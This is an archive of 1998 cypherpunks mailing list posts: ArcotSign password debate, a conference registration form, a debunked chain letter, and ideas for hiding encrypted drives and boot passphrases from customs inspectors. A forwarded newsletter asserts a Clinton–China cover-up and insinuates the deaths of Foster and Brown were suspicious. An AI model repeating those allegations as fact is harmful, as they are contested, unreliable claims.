From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Heinz-Juergen Keller <hjk@dip.de>
Date: Tue, 22 Sep 1998 04:21:32 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)
In-Reply-To: <199809212320.SAA19200@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.980922105625.1330A-100000@alien.lummerland.de>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 21 Sep 1998, Jim Choate wrote:

> Date: Mon, 21 Sep 1998 18:20:57 -0500 (CDT)
> From: Jim Choate <ravage@einstein.ssz.com>
> To: Cypherpunks Distributed Remailer <cypherpunks@einstein.ssz.com>
> Subject: RE: atheism (was: RE: Democracy... (fwd)) (fwd)
> 
(stuff deleted)
> 
> We're doing Boolean Algebra here not Algebra, the rules for transitory
> functions are different.
A natural language is *not* boolean.
It is a Peano-Algebra.(with some more restrictions)
 [R.Montague: Universal Grammar]
 
(much stuff deleted)

  Heinz-Juergen Keller  hjk@mail.dip.de   hjkeller@gmx.[net,de]
  2047bit PGP Public Key : http://www.dip.de/~hjk/
  MD5 Fingerprint: 4d33126fbf8c1bcd8e96ba90d99f0bdc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 22 Sep 1998 11:13:26 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809221548.KAA04187@einstein.ssz.com>
Message-ID: <v03110707b22d7b8e3d40@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:48 AM -0500 9/22/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Tue, 22 Sep 1998 09:32:49 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: Stego-empty hard drives... (fwd)
>
>> 	Why prompt, you installed it, just have the startup stop at a
>> certain point, just simply pause. You hit a couple keys (4-8) and go on.
>> Given this case you don't really need the security of a long passphrase
>> since if they are looking to get in, you've lost already.
>
>You'll probably not want it to stop, simpy wait a few seconds. Also, if
>the passphrase is incorrect you'll not want to issue any error messages.
>
>Stopping the boot may be a good indication of a problem.

	I don't know how hard this would be, but how about running a
seperate memory check, and while those numbers are flashing on the screen,
do the wait for imput?

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 11:05:00 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221631.LAA04509@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 11:32:03 -0500
> From: Mark Hahn <mhahn@tcbtech.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> If you need fast random access, then neither version of CD will be
> suitable. Hence the PCMCIA Hard Disk. However, you may have 
> difficulty coming up with a cover story if, indeed, you do not want
> to tell  a customs officer, "Oh, yeah, that's a portable disk drive".

It occured to me that it might be feasible to ship such devices seperately
via Fed-Ex or whatever. The question becomes, what do such countries as
Great Britian plan for materials crossing their borders in this manner? Are
they going to search each package and examine its contents? What does this
mean for Dell and their ilk? The ramifications of this aspect are of some
interest...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hahn <mhahn@tcbtech.com>
Date: Tue, 22 Sep 1998 10:40:50 +0800
To: Mok-Kong Shen <cypherpunks@toad.com
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809220116.UAA20070@einstein.ssz.com>
Message-ID: <3.0.1.32.19980922113203.0097b4b0@mail.aosi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:33 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>Mark Hahn wrote:
>> 
>> 2) If you can't leave your floppy at home, carry your sensitive data on
>> a PCMCIA Type-II Hard Drive. Kingston sells one sporting 500MB
>> of capacity. Pop it out and put it as far away from the laptop as you
>> can. Inside your other luggage somewhere.
>
>I am ignorant about hardware. Question: Wouldn't it be possible to
>somehow put information on a music CD?

Sure. Simply trade offs of what's important to you and the situation you
might be in. 

If disguise is a primary factor, then a write once music CD would be
excellent.  If you need re-writable capability, use a CD-RW (re-writable
CD). However a CD-RW appears gold underneath, not sliver-ish, so
you have less of a disguise.

If you need fast random access, then neither version of CD will be
suitable. Hence the PCMCIA Hard Disk. However, you may have 
difficulty coming up with a cover story if, indeed, you do not want
to tell  a customs officer, "Oh, yeah, that's a portable disk drive".

As another trade off, most Laptops don't have CD-ROM writing drives,
so you would need an outboard drive. There are probably slick, portable
versions available, but that's more junk to lug through the airport
(and to explain, if necessary.)

Also, I was trying to suggest something practical to address the problem.
I.e. can be done in a week and under $500. Some of us could re-write the
BIOS and flash in the update in that time frame. Others of us will find
a credit card and mail order an easier route to take. (uh... minus the
lack of anonymity of buying mail order....)

-MpH
--------
Mark P. Hahn                    Work: 212-278-5861
mhahn@tcbtech.com               Home: 609-275-1834
TCB Technologies, Inc (mhahn@tcbtech.com)

Consultant to:
The SoGen Funds	1221 Avenue of the Americas, NY NY




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 12:01:33 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <4.0.2.19980922114142.00956610@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:04 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>Bruce Schneier wrote:
>> 
>> >I suppose you misunderstood me. I mean the 'mathematical magic'
>> >cannot be made public. (Or is 'online protocol' = 'mathematical magic'?)
>> >If the 'magic' is public then the attacker with the pool of passwords
>> >could brute force offline.
>> 
>> No.  You misunderstood me.  There is NOTHING secret except the key.
>> The online protocol, mathematical magic, source code, algorithm details,
>> and everything else can be made public.  There are no secrets in the
>> system except for the keys.
>
>In that case please allow me to go back to a point raised by me
>previously. The user uses his 'remembered secret' (of fewer bits) 
>through a public algorithm (including protocol) to retrieve from a 
>pool the password (of more bits). If the attacker doesn't have the 
>pool then everything looks fine. But if he manages to get the pool
>(a case someone mentioned in this thread) then he can obviously
>brute force offline, I believe, since he possesses now everything
>the legitimate user has, excepting the 'remembered secret'. Or is
>there anything wrong with my logic?

Yes.  There is something wrong with you logic.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 22 Sep 1998 12:02:21 +0800
To: Ben Laurie <ben@algroup.co.uk>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <4.0.2.19980922114219.00928f00@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:24 PM 9/22/98 +0100, Ben Laurie wrote:
>Bruce Schneier wrote:
>> >(I suppose the 'remembered secret' has less bits then the 'password'
>> >that is to be retrieved from the pool of millions with the
>> >'mathematical magic'). So the advantages of the scheme appear to
>> >remain unclear as a matter of principle.
>> 
>> The advantages are that offline password guessing is impossible.
>
>The 'I' word always makes me nervous - do you really mean that, or do
>you just mean "very difficult"?

Intractable, actually.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@algroup.co.uk>
Date: Tue, 22 Sep 1998 06:00:13 +0800
To: Colin Plumb <colin@nyx.net>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809220552.XAA17972@nyx10.nyx.net>
Message-ID: <36078211.1C7A64AF@algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Colin Plumb wrote:
> 
> Doug, I'd just like to thank you for replying.  Even without looking at your
> description, the fact that you are willing to talk to doubters and admit
> the limitations of your technique make me a lot more comfortable believing
> that you have something.  You don't fit into either of the two standard
> types of snake-oil salesmen: The "I can't tell you because it's secret"
> sort, and the "it's totally unbreakable, cures world hunger and
> disposes of nuclear waste" sort.

Clearly I failed to understand this, then:

"This note doesn't tell everything about our method--we *are* developing
a commercial product, after all..."

which somehow doesn't translate to "I can't tell you because it's
secret", it seems.

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686| Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org/
and Technical Director|Email: ben@algroup.co.uk |
A.L. Digital Ltd,     |Apache-SSL author     http://www.apache-ssl.org/
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache/

WE'RE RECRUITING! http://www.aldigital.co.uk/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gene Tsudik <tsudik@pollux.usc.edu>
Date: Tue, 22 Sep 1998 14:03:27 +0800
To: cypherpunks@toad.com
Subject: Fifth ACM Conference on Computer and Communications Security
Message-ID: <199809221855.LAA12108@pollux.usc.edu>
MIME-Version: 1.0
Content-Type: text/plain






This is the Call for Participation for the  5th ACM Conference on 
Computer and Communications Security that will take place in San 
Francisco Nov 2-5.

Below please find the REGISTRATION form.
The official conference homepage is at: 

            http://www.bell-labs.com/user/reiter/ccs5/

It includes, among other things, the conference program, information
about invited talks, speakers and tutorials. 


------------------------- cut here ----------------------------------



Fifth ACM Conference on Computer and Communications Security

                   REGISTRATION FORM

          Name:_____________________________________________

   Affiliation:_____________________________________________

Postal Address:_____________________________________________

               _____________________________________________

               _____________________________________________

         Phone:_____________________________________________

           Fax:_____________________________________________

         Email:_____________________________________________

Note: Notification of receipt of registration form will be sent via email.
      Address information will be distributed to all attendees.

Please mark the appropriate registration categories.  Payment must be
included and must be either by check in U.S. dollars, drawn on a U.S.
bank and made payable to "ACM Conference on Computer and
Communications Security", or by credit card.  Dates are strictly
enforced by postmark.

Attendees who register for tutorials can attend any of the four
half-day tutorials.  However, to assist in planning, please indicate
which tutorials you are likely to attend.

 Morning sessions (choose one):
  ___  Cryptography: Theory and Applications (Dan Boneh)
  ___  Programming Languages and Security (Martin Abadi, George Necula)

 Afternoon sessions (choose one):
  ___  Authentication protocol verification and analysis (Jon Millen)
  ___  Emerging models in electronic commerce (Doug Tygar)

The following tutorial registration fees include admission to all
tutorials, and must be paid in full if any tutorial is attended.

 Advance tutorial registration (on or before October 1, 1998)
  ___  ................................................................$300.00
  ___  Full-time Student...............................................$100.00
 Late tutorial registration (after October 1, 1998)
  ___  ................................................................$395.00
  ___  Full-time Student...............................................$100.00

Conference registration includes admission to the regular conference
programs (but not the tutorials), conference proceedings, continental
breakfast, lunch, and reception/dinner.

 Advance conference registration (on or before October 1, 1998)
  ___  Member, ACM or ACM SIGSAC (Member #__________, required)........$315.00
  ___  Non-Member......................................................$390.00
  ___  Full-time Student...............................................$100.00
 Late conference registration (after October 1, 1998)
  ___  Member, ACM or ACM SIGSAC (Member #__________, required)........$375.00
  ___  Non-Member......................................................$465.00
  ___  Full-time Student...............................................$100.00


Do you have any special requirements?_________________________________________

Please indicate your method of payment by checking the appropriate box:

  [ ] Check in U.S. funds drawn on a U.S. bank (PLEASE ENCLOSE WITH THIS FORM)

  Credit card authorization:
  (Charges will appear on your statement as made by ACM.
   Note: your credit card number will be processed by the ACM.)

         Visa        MasterCard      American Express     Diners Club
         [ ]            [ ]                [ ]                [ ]

  Credit Card Number:_________________________________________________________

  Card Holder Name:______________________________Expiration Date:_____________

Mail registration to:                     Or Email this form (CREDIT CARD
        Li Gong                           REGISTRATIONS ONLY) to:
        Sun Microsystems                  li.gong@sun.com with the subject
        MS UCUP02-102                     ACM CCS registration
        901 San Antonio Road
        Palo Alto, CA 94303-4900, USA

>>>>SORRY, NO REFUNDS.<<<<

Hotel Reservations - The Fairmont Hotel, San Francisco
======================================================
The legendary Fairmont Hotel in San Francisco is situated atop the
exclusive Nob Hill area, with a panoramic view of the City and San
Francisco Bay.  Nearby, cable cars stop to carry guests to Union
Square and the Financial District as well as nearby Chinatown,
Ghirardelli Square and Fisherman's Wharf.

Hotel reservations must be made under the group name "Association of
Computing Machinery/ACM CCS".  The special group rate is

Main Building:  $155 single and $175 double occupancy
Tower/Bay View: $185 single and $205 double occupancy

There is an additional 14% tax.  These rates are guaranteed for the
period of the conference only.  The cut-off date for reservations is
Thursday, October 8, 1998.  Reservations made after this date will be
accepted on a space available basis, but due to the busy season,
reservations should be made as early as possible.  Reservations must
be guaranteed by a credit card or it must be accompanied by an advance
deposit for the first night.  You may cancel your individual
reservations up to 24 hours prior to arrival, after which your deposit
becomes non-refundable.  Please be advised the check-in time is after
3:00 p.m.; check-out is 1:00 p.m.

For reservations and information, contact:

The Fairmont Hotel
950 Mason Street
San Francisco, CA 94108
Tel: +1 415-772-5000
     +1 800-527-4727

Transportation from the San Francisco International Airport to the
hotel can be via taxi, which takes about 30 minutes and costs about
$30, or via shuttle at a cost of around $12.  Shuttle information can
be found at the airport.
=============================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Mundy <mgm@tis.com>
Date: Tue, 22 Sep 1998 11:21:33 +0800
To: cypherpunks@toad.com
Subject: Remove
Message-ID: <Pine.SOL.3.95.980922121217.7644C-100000@clipper>
MIME-Version: 1.0
Content-Type: text/plain



remove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chiu Ngan" <simpsonngan@hotmail.com>
Date: Tue, 22 Sep 1998 14:38:27 +0800
To: vanessa.ho@mailexcite.com
Subject: Fwd: RE: HOAX: I don't care if this is real or not! But forwarding is	not hard for me if I help
Message-ID: <19980922193105.260.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain






>From ptrei@securitydynamics.com Wed Sep 16 06:49:03 1998
>Received: from mail.securitydynamics.com by 
tholian.securitydynamics.com
>          via smtpd (for mail.hotmail.com [209.1.112.253]) with SMTP; 
16 Sep 1998 13:48:16 UT
>Received: by securitydynamics.com (8.7.6/8.7.3) with ESMTP id JAA08933; 
Wed, 16 Sep 1998 09:54:39 -0400 (EDT)
>Received: by exna01.securitydynamics.com with Internet Mail Service 
(5.0.1460.8)
>	id <RT690391>; Wed, 16 Sep 1998 09:52:43 -0400
>Message-ID: 
<D104150098E6D111B7830000F8D90AE824064B@exna02.securitydynamics.com>
>From: "Trei, Peter" <ptrei@securitydynamics.com>
>To: "'Chiu Ngan'" <simpsonngan@hotmail.com>, dueli@hotmail.com,
>        centrebet@centrebet.com.au, contact@unsw.edu.au, 
Declan@well.com,
>        Dodwellleung@hotmail.com, dlin@gpu.srv.ualberta.ca,
>        dorngan@hkstar.com.hk, cypherpunks@toad.com, 
cj2802@singnet.com.sg,
>        parsley@unforgettable.com, S.Lundy@unsw.edu.au, 
accounts@magna.com.au,
>        n.harding@unsw.edu.au, philiph@magna.com.au, ulf@fitug.de,
>        leevv@hotmail.com, vanessa.ho@mailexcite.com
>Subject: RE: HOAX: I don't care if this is real or not! But forwarding 
is
>	not hard for me if I help
>Date: Wed, 16 Sep 1998 09:50:23 -0400
>MIME-Version: 1.0
>X-Mailer: Internet Mail Service (5.0.1460.8)
>Content-Type: text/plain
>
>You should care. Not checking on such obvious
>hoaxes makes you look like an idiot. It took
>me less than 30 seconds to establish that this
>is yet another urban legend. Check:
>
>http://www.inform.umd.edu/mdk-12/help/xhoax.html#liver
>
>
>Chiu Ngan [simpsonngan@hotmail.com] forwarded:
>> >>>>Hello, my name is David "Darren" Bucklew. I live in 
>> >>>>Pittsburgh PA where I attend Bethel Park High School
>> >>>>and participate in  many sports.  I have severe
>> >>>>ostriopliosis of the liver. (My liver is extremely 
>> >>>>inflamed).
>> >>>>Modern Science has yet to find a cure.  Valley
>> >>>>Childrens hospital 
>> >>>>> has agreed to donate  7 cents to the National
>> >>>>Diesese Society for every name 
>> >>>> on  this letter.Please send it around as much as you
>> >>>>can.
>> >>>>Thank you,
>> >>>>Darren
>> >>>>
>> >>>>PS: For those of you who dont take 5 minutes to do 
>> >>>>this, what goes around comes around. You can help
>> >>>>sick people, and it costs you nothing,yet you are too
>> >>>>lazy to do it?  You will get what you deserve. 
>> 
>


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 22 Sep 1998 11:35:51 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Dead Men Tell No Tales
Message-ID: <v04011727b22d8143cb8b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Tue, 22 Sep 1998 05:18:16 -0400 (EDT)
To: ignition-point@majordomo.pobox.com
From: softwar@us.net (CharlesSmith)
Subject: IP: Dead Men Tell No Tales
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: softwar@us.net (CharlesSmith)

http://www.worldnetdaily.com/smith/980922.comcs.html

It is said, "dead men tell no tales."  If that were true, then
America would have never known of the real story behind the
Clinton administration.  Two dead men are calling from their
graves for the last few years of their lives to be told.  The
ghosts of Vince Foster and Ron Brown hover over Bill Clinton.

Vince Foster and Ron Brown were both involved in the Clinton -
China encryption scandal.  One known event took place in May
1993 when Vince Foster, Webster Hubbell and Bernard Nussbaum
paid the National Security Administration (NSA) a visit.  These
three fine gentlemen, with close connections to Hillary Clinton
and the Arkansas Rose Office Law Firm, were tasked by President
Clinton to help develop policy for U.S. communications
technology.

According to Foster's secretary, the White House lawyer also had
binders from the NSA in his office.  Binders that were never
turned over by the White House.  White House officials denied
that Foster had any connection with the NSA.  However, documents
forced from the NSA by Washington Weekly and an interview with
former NSA Director Adm. McConnell both confirmed Foster's
presence at Ft. Meade in 1993.

Foster's attendance at Ft. Meade also confirmed that Attorney
General Janet Reno tasked Hubbell to encryption policy.  Hubbell
had access to Top Secret material on U.S. encryption.  This fact
was confirmed by a series of 1997 interviews with Democratic and
Republican staff members in the House.  Congressman Dan Burton
currently holds documents where Hubbell held long meetings with
Foster and now CIA Director George Tenet inside the White House
in 1993.  Burton cannot release those documents because
Democratic members have threatened to walk.

Hubbell was convicted in 1994 for fraud at the same time he was
paid hundreds of thousands of dollars by Indonesian billionaire
Moctar Riady.  Riady and his Lippo group had a great deal of
interest in advanced U.S. technology.  Riady's man inside the
Clinton administration was John Huang at the Brown Commerce
Department.  The Commerce Department asserted in writing in 1997
to this author that John Huang had no encryption documentation.

Yet, the CIA briefed Huang 37 times on satellite encryption
technology while at Commerce.  Huang's co-worker, former DNC
fundraiser Ira Sockowitz, walked out of the Commerce Department
in 1996 with over 2,000 pages of top secret information on
satellite encryption, space launch and earth imaging technology.

Sockowitz was supposed to fly with Brown on the fatal trade trip
but he took an advance flight ahead of the Secretary instead.
Sockowitz identified Ron Brown's body at the crash scene.
Sockowitz left Commerce with the secrets only days after Brown's
death.  He was never prosecuted nor investigated.

One Sockowitz document was so classified that the NSA sent a
representative to testify before Federal Judge Royce Lamberth in
order to keep it secret.  NSA testimony showed that Sockowitz
took a highly classified report based on informants from inside
other countries and inside the U.S.

The list of nations and foreign intelligence services affected
by the leaked report reads like a Rand McNally road map of
secret services around the world.  According to the testimony,
release of the report would affect the "careers" of many foreign
officials.  The last U.S. official who had similar career
problems was convicted spy Johnathan Pollard - now spending life
in prison for passing U.S. encryption secrets to Israel.

Other documents hidden among the Sockowitz files include a
classified series of memos from the Commerce Undersecretary for
Export Administration (BXA) William Reinsch.  The memos detail a
July 1996 Clinton waiver for Loral satellite exports to China
and Russia.  In July 1998, House National Security Committee
Chairman Spence told BXA head Reinsch to produce that memo and
other documents taken by Sockowitz.  So far, the White House and
Reinsch have been unable to comply.

Loral attorneys also claimed to Chairman Rohrabacher of the
House Space Sub-Committee that the million dollars Loral CEO
Schwartz gave to the DNC bought no special favors, and that
Loral passed no military technology to China.

The Loral claims are ridiculous.  Loral's own letters of
complaint to Ron Brown clearly show both claims to be false.
The claim that no military technology was exported is disputed
by Loral's own 1994 briefing memo given to Ron Brown that states
that satellites such as Globalstar were "commercial applications
of DoD technology."

Another example is when Loral DEFENSE President Jerald Lindfelt
wrote Brown a letter in 1996 where he expressed his desire to
sell advanced Synthetic Aperture Radar (SAR) technology to
China.  Lindfelt wrote "We've worked hard trying to resolve
these problems with the Department of State, the Department of
Commerce and the Defense Technology Security Administration
(DTSA), but someone in these organizations always manages to
block our participation...  Could you help us by identifying
someone in the Commerce Department high enough in the
organization to help us resolve these issues and open this
marketplace to our participation."

Thus, Loral "Defense" President Lindfelt asked Brown to
over-ride the State Department, the Defense Department and the
Commerce Department to ship a radar system that experts in all
three agencies had objected to.  Only Clinton could do that, and
he took big dollars from Bernard Schwartz.

The claim that Mr. Schwartz received no special favors is almost
laughable.  In 1996 Loral requested that President Clinton hold
up his signature on the Globalstar export waiver so Loral could
include an encrypted satellite telemetry control station for
China.

In 1994 President Clinton arranged for Schwartz to meet Shen
Rong-Jun, Vice Minister of the Chinese Commission of Science,
Technology and Industry for National Defense (COSTIND).  Of
course, Shen Rong-Jun usually goes by his better known title of
Lt. General Shen Rong-Jun of the People's Liberation Army.
COSTIND, according to the GAO, is "an agency of the Chinese
military (which) oversees development of China's weapon systems
and is responsible for identifying and acquiring
telecommunications technology applicable for military use."

Another example from the files of Ron Brown shows that the wife
of Chinese General Ding Henggao, Madam Nie Li, obtained
permission under a "commercial license" through the Commerce
Department to export an advanced - encrypted - secure fiber
optic communications system to China.  According to the same
documentation, General Ding Henggao is also the Director of
COSTIND.

The same 1996 document notes that Mr. Xie Zhichao, COSTIND
Electronics Design Bureau Director, and communications expert
Deng Changru were part of the executive management for the same
Chinese front company.  Mr. Xie and Mr. Deng also have other
formal titles.  They are both Lt. Colonels in the Chinese Red
Army.  These astonishing facts on Clinton - Chinese Army deals
come directly from the U.S. Commerce Department.

Yet, the Commerce Department claimed on September 1, 1998 that
it cannot "confirm nor deny the existence of any records" in
regard to a Freedom of Information (FOIA) request for
information on "COSTIND".  Furthermore, the Commerce Department
claims "If records were to exist they would be exempt from
disclosure...  unless the release of such information is
determined by the Secretary to be in the national interest."

Obviously, I can confirm that documents on COSTIND exist inside
the Commerce Department.

There is still more evidence the Commerce Department is covering
up crimes committed under Secretary Brown.  For example, in
response to two different FOIA requests, the Commerce Department
returned one trade report twice in 1998.  The first version of
the trade report was heavily blacked out for "commercial" and
"privacy" reasons.  The second, a duplicate of the first,
revealed that Indonesian dictator Suharto had cut his son-in-law
in on a private powerplant deal built and financed by the U.S.
government.  Of course, the U.S. contractor that needed Brown
advocacy to win the deal was also a big donor to the DNC.

The accidentally released 1994 APEC Advocacy trade report spells
out exactly the kind of data being withheld from the U.S.
public.  The report shows the Brown Commerce Department pushed
the power plant despite known corruption and kickbacks.  "ADB is
skiddish about involvement of Indonesia's first family (a
minority shareholder is married to Pres. Suharto's daughter)...
Ambassador Barry has been working with Executive Director Linda
Yang, at the ADB who is 'doing all she can.'"

Another page from the 1994 trade report shows that Commerce
officials were suspicious of Indonesian corruption with French
space companies.  The document notes the intense competition to
win satellite launch contracts for Indonesia between the U.S.
and France included "allegations that the French have paid
'incentive money' to the Indonesians, but this cannot be
confirmed."

Written evidence that American, Indonesian and French taxpayers
were being swindled.  Three governments, spanning three
continents, all involved in one crime.  A trail of evidence
leading to the Commerce Department and to Bill Clinton, all
blacked out in one hidden report from the late Ron Brown.

The ghosts of dead men haunt this government, kept alive by
fresh lies and hidden under blacked out reports.  Evidence on
the transfer of nuclear missile technology to communist China
and kickbacks to the Clinton/Gore campaign.  Despite the
evidence of crimes - the cover-up continues at the Commerce
Department, at Ft. Meade, and inside the White House.

============================================================

index of source documents -

http://www.softwar.net/costind.html

================================================================
1 if by land, 2 if by sea.  Paul Revere - encryption 1775
Charles R. Smith
SOFTWAR         http://www.softwar.net      softwar@softwar.net
Pcyphered SIGNATURE:
2BCB1A1B6350FF06670487EF4EC39FA8539A8B6B2720FA81AFA3F989DE9212C9
0F35E078318ED643A042651B7D3AB98E1FFC6193C4BD66B6ECD09A7284497DD0
A830BB83F7E72248
================================================================
SOFTWAR EMAIL NEWSLETTER                            09/22/1998
***  to unsubscribe reply with "unsubscribe" as subject    ***
================================================================






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Stay <staym@accessdata.com>
Date: Tue, 22 Sep 1998 13:39:48 +0800
To: mok-kong.shen@stud.uni-muenchen.de
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
Message-ID: <3607EF93.701D@accessdata.com>
MIME-Version: 1.0
Content-Type: text/plain



>>In that case please allow me to go back to a point raised by me
>>previously. The user uses his 'remembered secret' (of fewer bits) 
>>through a public algorithm (including protocol) to retrieve from a 
>>pool the password (of more bits). If the attacker doesn't have the 
>>pool then everything looks fine. But if he manages to get the pool
>>(a case someone mentioned in this thread) then he can obviously
>>brute force offline, I believe, since he possesses now everything
>>the legitimate user has, excepting the 'remembered secret'. Or is
>>there anything wrong with my logic?
>
>Yes.  There is something wrong with you logic.
>
>Bruce
>**********************************************************************
>Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
>101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
>           Free crypto newsletter.  See:  http://www.counterpane.com

According to the website, there's no pool of passwords.  There's a
truncated hash that will catch most mistakes, but is useless as a test
criterion in a dictionary attack.  If you get the user's "public" key,
then you can do a dictionary attack.  The user's "public" key isn't
public, however; not even the user knows it.  If I'm understanding it
right, it's stored encrypted and the key is only given to a set of
predefined servers.  Prior relationship must exist; they admit that.
-- 
Mike Stay
Cryptographer / Programmer
AccessData Corp.
mailto:staym@accessdata.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 12:18:36 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221743.MAA05104@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 11:07:34 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> 	I don't know how hard this would be, but how about running a
> seperate memory check, and while those numbers are flashing on the screen,
> do the wait for imput?

So hide the keyscan in the memory counter code. Would work externaly, would
probably not show up on TEMPEST. Since both the keyscan and the memory scan
are repetitive TEMPEST might have a problem telling them apart. Provided you
could get the keyscan in the same footprint as the mem check the BIOS
would not show up as anomolous in size. As long as they're not running
around doing checksums you'd be ok (I suspect).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 22 Sep 1998 06:06:11 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <36078061.D34D26D@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier wrote:
> 
> At 08:59 AM 9/22/98 +0100, Mok-Kong Shen wrote:

> >A question : How does the legitimate user find his password?
> >(Sorry for not having followed this thread from the beginning.)
> 
> He uses a remembered secret and some mathematical magic.

Another naive question: Why is the remembered secret not sufficient
(thus doing away with the magic)?

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 22 Sep 1998 11:58:29 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809221500.KAA03503@einstein.ssz.com>
Message-ID: <3607D670.2FB37E4E@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

